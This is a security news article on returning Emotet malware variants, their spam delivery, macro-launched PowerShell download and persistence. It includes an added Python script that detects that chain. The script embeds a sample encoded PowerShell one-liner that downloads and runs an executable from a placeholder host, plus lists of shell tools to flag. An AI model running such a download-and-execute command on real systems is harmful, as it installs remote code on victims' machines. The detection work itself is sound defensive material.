EMOTET banking malware returns with a wider scope & vengeance

The EMOTET banking malware has emerged with a wider target scope than ever before, three years after it was originally found.

The original malware primarily targeted the banking sector and monitored network activity in order to steal information. It was distributed through spam messages disguised as invoices and bank transfers.

Trend Micro researchers discovered the new Emotet variants in August. The variants were detected as TSPY_EMOTET.AUSJLA, TSPY_EMOTET.SMD3, TSPY_EMOTET.AUSJKW and TSPY_EMOTET.AUSJKV.

Researchers believe that the new variants were built to reach new geographic regions and business sectors, while their core function as an information stealer is unchanged.

Smart Protection Network data showed the malware hitting a range of industries, including healthcare and hospitality. The largest share of detections was in the US, with the UK and the ‘other’ country grouping each accounting for 12%.

Because the malware has been dormant for so long, researchers believe the new wave of attacks is trying to catch targets off guard, which increases its effectiveness.

“For a malware with email-spamming and lateral-movement capabilities, infecting business systems and acquiring corporate e-mails translates to larger and more effective spam targeting and a higher chance of gaining information,” Trend Micro researchers say.

The new variants also use botnets to deliver spam. Like the original Emotet, they mimic an invoice or payment notification to trick users into clicking a malicious URL. That URL downloads a document carrying a malicious macro, which executes once the user opens the document and allows the macro to run.

The macro runs PowerShell commands that download and execute the malware on the system. The malware then registers itself as a system service so that it runs at every startup, researchers say.

It can then make the infected system part of its botnet, deliver payloads such as Dridex, steal usernames and passwords and harvest email information.
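The chain just described (Office document, macro, PowerShell download, service-based persistence) is what a detection engineer would look for on the endpoint. The script below is an added example, not code from Trend Micro or from the article: it runs two heuristics over constructed, Sysmon-style JSON event lines. The first flags an Office application spawning a shell and decodes any `-enc` PowerShell payload so the download command becomes readable; the second flags a newly installed service (Event ID 7045) whose binary lives under a user-writable path. The field names, the sample command line, the service name and the paths are assumptions made for the example and are not indicators from the report.

```python
"""Heuristics for the macro -> PowerShell -> service persistence chain."""
import base64
import json
import re

# Constructed sample payload: the kind of one-liner a malicious macro hands to
# PowerShell. Encoded the way -EncodedCommand expects (UTF-16LE, base64).
# This is made up for the example; it is not an Emotet artefact.
ENCODED = base64.b64encode(
    'IEX (New-Object Net.WebClient).DownloadFile("http://example.invalid/inv.exe", '
    '"$env:TEMP\\inv.exe"); Start-Process "$env:TEMP\\inv.exe"'.encode("utf-16le")
).decode()

# Constructed sample events, loosely modelled on Sysmon Event ID 1 (process
# creation) and System-log Event ID 7045 (new service installed).
SAMPLE_EVENTS = [
    json.dumps({"EventID": 1,
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
                "CommandLine": f"powershell.exe -w hidden -ep bypass -enc {ENCODED}"}),
    json.dumps({"EventID": 1,
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"}),
    json.dumps({"EventID": 7045, "ServiceName": "WinSvcHost",
                "ImagePath": r"C:\Users\alice\AppData\Local\Temp\svchost.exe",
                "StartType": "auto start"}),
    json.dumps({"EventID": 7045, "ServiceName": "Spooler",
                "ImagePath": r"C:\Windows\System32\spoolsv.exe",
                "StartType": "auto start"}),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Directories an unprivileged user can write to; a service binary here is suspect.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Downloads)\\", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded payload of a -e/-enc/-EncodedCommand argument, or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_event(event):
    """Return a list of (rule, detail) findings for one parsed event."""
    findings = []
    if event.get("EventID") == 1:
        image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
        parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        if parent in OFFICE_APPS and image in SHELLS:
            findings.append(("office_spawns_shell", f"{parent} -> {image}"))
            decoded = decode_encoded_command(event.get("CommandLine", ""))
            if decoded:
                findings.append(("encoded_powershell", decoded))
    elif event.get("EventID") == 7045:
        path = event.get("ImagePath", "")
        if USER_WRITABLE.search(path):
            findings.append(("service_from_user_writable_path",
                             f"{event.get('ServiceName')}: {path}"))
    return findings


def scan(lines):
    """Parse JSON event lines and collect findings; skip lines that are not JSON."""
    results = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        results.extend(check_event(event))
    return results


if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Both rules are deliberately narrow so that a backup script launched from Explorer or the real print spooler service produces no finding; in practice they belong in a SIEM rule alongside the mail-gateway controls the article implies, and the parent/child pairing should be extended to whatever scripting hosts your environment actually sees spawned from Office.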

Emotet can also propagate across the network, and it uses compromised URLs for command and control.

“The malware can also turn the infected system into part of a botnet that sends spam emails intended to spread the malware even further. This allows the trojan to spread quickly, as the more systems it can potentially infect, the faster it will propagate. The malware is also capable of harvesting email information and stealing username and password information found in installed browsers,” researchers conclude.

Multilayered security is recommended for protection against threats such as Emotet.